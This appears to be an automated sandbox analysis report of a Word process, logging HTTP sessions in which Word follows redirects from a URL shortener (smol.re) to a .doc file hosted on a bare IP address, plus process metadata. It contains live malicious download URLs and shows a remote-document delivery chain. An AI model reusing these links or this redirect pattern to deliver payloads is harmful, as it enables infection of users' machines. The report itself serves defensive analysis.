                                    Apr 18, 2025 06:56:14.155771017 CEST340OUTHEAD /630/nbh/wverygoodpersononherewithgreatnessbackforme________verygoodpersononherewithgreatnessbackforme______verygoodpersononherewithgreatnessbackforme.doc HTTP/1.1
                                    X-MS-CookieUri-Requested: t
                                    X-FeatureVersion: 1
                                    X-IDCRL_ACCEPTED: t
                                    User-Agent: Microsoft Office Existence Discovery
                                    Connection: Keep-Alive
                                    Host: 203.202.232.170
                                    Apr 18, 2025 06:56:14.413861990 CEST321INHTTP/1.1 200 OK
                                    Date: Fri, 18 Apr 2025 04:56:14 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                    Last-Modified: Wed, 16 Apr 2025 17:19:28 GMT
                                    ETag: "15dde-632e87cd3c69c"
                                    Accept-Ranges: bytes
                                    Content-Length: 89566
                                    Keep-Alive: timeout=5, max=99
                                    Connection: Keep-Alive
                                    Content-Type: application/msword


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.2460827104.21.20.1964437056C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-04-18 04:56:08 UTC320OUTOPTIONS / HTTP/1.1
                                    Connection: Keep-Alive
                                    Authorization: Bearer
                                    User-Agent: Microsoft Office Word 2014
                                    X-Office-Major-Version: 16
                                    X-MS-CookieUri-Requested: t
                                    X-FeatureVersion: 1
                                    Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
                                    X-MSGETWEBURL: t
                                    X-IDCRL_ACCEPTED: t
                                    Host: smol.re
                                    2025-04-18 04:56:08 UTC482INHTTP/1.1 200 OK
                                    Date: Fri, 18 Apr 2025 04:56:08 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Allow: GET,HEAD
                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                    X-Content-Type-Options: nosniff
                                    X-Dns-Prefetch-Control: off
                                    X-Download-Options: noopen
                                    X-Frame-Options: SAMEORIGIN
                                    X-Xss-Protection: 1; mode=block
                                    Cf-Cache-Status: DYNAMIC
                                    Server: cloudflare
                                    CF-RAY: 932192ed89d66762-ATL
                                    alt-svc: h3=":443"; ma=86400
                                    2025-04-18 04:56:08 UTC13INData Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
                                    Data Ascii: 8GET,HEAD
                                    2025-04-18 04:56:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.2460828104.21.20.1964437056C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-04-18 04:56:09 UTC223OUTOPTIONS / HTTP/1.1
                                    Authorization: Bearer
                                    X-MS-CookieUri-Requested: t
                                    X-FeatureVersion: 1
                                    X-IDCRL_ACCEPTED: t
                                    User-Agent: Microsoft Office Protocol Discovery
                                    Host: smol.re
                                    Content-Length: 0
                                    Connection: Keep-Alive
                                    2025-04-18 04:56:09 UTC482INHTTP/1.1 200 OK
                                    Date: Fri, 18 Apr 2025 04:56:09 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Allow: GET,HEAD
                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                    X-Content-Type-Options: nosniff
                                    X-Dns-Prefetch-Control: off
                                    X-Download-Options: noopen
                                    X-Frame-Options: SAMEORIGIN
                                    X-Xss-Protection: 1; mode=block
                                    Cf-Cache-Status: DYNAMIC
                                    Server: cloudflare
                                    CF-RAY: 932192f2dadf44cf-ATL
                                    alt-svc: h3=":443"; ma=86400
                                    2025-04-18 04:56:09 UTC13INData Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
                                    Data Ascii: 8GET,HEAD
                                    2025-04-18 04:56:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.2460829104.21.20.1964437056C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-04-18 04:56:10 UTC305OUTHEAD /i1P8xb HTTP/1.1
                                    Connection: Keep-Alive
                                    Authorization: Bearer
                                    User-Agent: Microsoft Office Word 2014
                                    X-Office-Major-Version: 16
                                    X-MS-CookieUri-Requested: t
                                    X-FeatureVersion: 1
                                    Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
                                    X-IDCRL_ACCEPTED: t
                                    Host: smol.re
                                    2025-04-18 04:56:10 UTC664INHTTP/1.1 302 Found
                                    Date: Fri, 18 Apr 2025 04:56:10 GMT
                                    Content-Type: text/plain; charset=utf-8
                                    Content-Length: 198
                                    Connection: close
                                    Location: http://203.202.232.170/630/nbh/wverygoodpersononherewithgreatnessbackforme________verygoodpersononherewithgreatnessbackforme______verygoodpersononherewithgreatnessbackforme.doc
                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                    Vary: Accept
                                    X-Content-Type-Options: nosniff
                                    X-Dns-Prefetch-Control: off
                                    X-Download-Options: noopen
                                    X-Frame-Options: SAMEORIGIN
                                    X-Xss-Protection: 1; mode=block
                                    Cf-Cache-Status: DYNAMIC
                                    Server: cloudflare
                                    CF-RAY: 932192f83bfbc01d-ATL
                                    alt-svc: h3=":443"; ma=86400


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.2460832104.21.20.1964437056C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-04-18 04:56:11 UTC185OUTGET /i1P8xb HTTP/1.1
                                    Accept: */*
                                    User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    Host: smol.re
                                    Connection: Keep-Alive
                                    2025-04-18 04:56:12 UTC664INHTTP/1.1 302 Found
                                    Date: Fri, 18 Apr 2025 04:56:12 GMT
                                    Content-Type: text/plain; charset=utf-8
                                    Content-Length: 198
                                    Connection: close
                                    Location: http://203.202.232.170/630/nbh/wverygoodpersononherewithgreatnessbackforme________verygoodpersononherewithgreatnessbackforme______verygoodpersononherewithgreatnessbackforme.doc
                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                    Vary: Accept
                                    X-Content-Type-Options: nosniff
                                    X-Dns-Prefetch-Control: off
                                    X-Download-Options: noopen
                                    X-Frame-Options: SAMEORIGIN
                                    X-Xss-Protection: 1; mode=block
                                    Cf-Cache-Status: DYNAMIC
                                    Server: cloudflare
                                    CF-RAY: 932193017bfbbf75-ATL
                                    alt-svc: h3=":443"; ma=86400
                                    2025-04-18 04:56:12 UTC198INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 30 33 2e 32 30 32 2e 32 33 32 2e 31 37 30 2f 36 33 30 2f 6e 62 68 2f 77 76 65 72 79 67 6f 6f 64 70 65 72 73 6f 6e 6f 6e 68 65 72 65 77 69 74 68 67 72 65 61 74 6e 65 73 73 62 61 63 6b 66 6f 72 6d 65 5f 5f 5f 5f 5f 5f 5f 5f 76 65 72 79 67 6f 6f 64 70 65 72 73 6f 6e 6f 6e 68 65 72 65 77 69 74 68 67 72 65 61 74 6e 65 73 73 62 61 63 6b 66 6f 72 6d 65 5f 5f 5f 5f 5f 5f 76 65 72 79 67 6f 6f 64 70 65 72 73 6f 6e 6f 6e 68 65 72 65 77 69 74 68 67 72 65 61 74 6e 65 73 73 62 61 63 6b 66 6f 72 6d 65 2e 64 6f 63
                                    Data Ascii: Found. Redirecting to http://203.202.232.170/630/nbh/wverygoodpersononherewithgreatnessbackforme________verygoodpersononherewithgreatnessbackforme______verygoodpersononherewithgreatnessbackforme.doc


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.2460838104.21.20.1964437056C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                    TimestampBytes transferredDirectionData
                                    2025-04-18 04:56:13 UTC208OUTHEAD /i1P8xb HTTP/1.1
                                    Authorization: Bearer
                                    X-MS-CookieUri-Requested: t
                                    X-FeatureVersion: 1
                                    X-IDCRL_ACCEPTED: t
                                    User-Agent: Microsoft Office Existence Discovery
                                    Host: smol.re
                                    Connection: Keep-Alive
                                    2025-04-18 04:56:14 UTC664INHTTP/1.1 302 Found
                                    Date: Fri, 18 Apr 2025 04:56:14 GMT
                                    Content-Type: text/plain; charset=utf-8
                                    Content-Length: 198
                                    Connection: close
                                    Location: http://203.202.232.170/630/nbh/wverygoodpersononherewithgreatnessbackforme________verygoodpersononherewithgreatnessbackforme______verygoodpersononherewithgreatnessbackforme.doc
                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                    Vary: Accept
                                    X-Content-Type-Options: nosniff
                                    X-Dns-Prefetch-Control: off
                                    X-Download-Options: noopen
                                    X-Frame-Options: SAMEORIGIN
                                    X-Xss-Protection: 1; mode=block
                                    Cf-Cache-Status: DYNAMIC
                                    Server: cloudflare
                                    CF-RAY: 9321930d8929b007-ATL
                                    alt-svc: h3=":443"; ma=86400


                                    050100s020406080100

                                    Click to jump to process

                                    050100s0.0050100150MB

                                    Click to jump to process

                                    • File
                                    • Registry

                                    Click to dive into process behavior distribution

                                    Target ID:0
                                    Start time:00:56:03
                                    Start date:18/04/2025
                                    Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                                    Imagebase:0x7ff79de30000
                                    File size:1'637'952 bytes
                                    MD5 hash:A9F0EC89897AC6C878D217DFB64CA752
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    No disassembly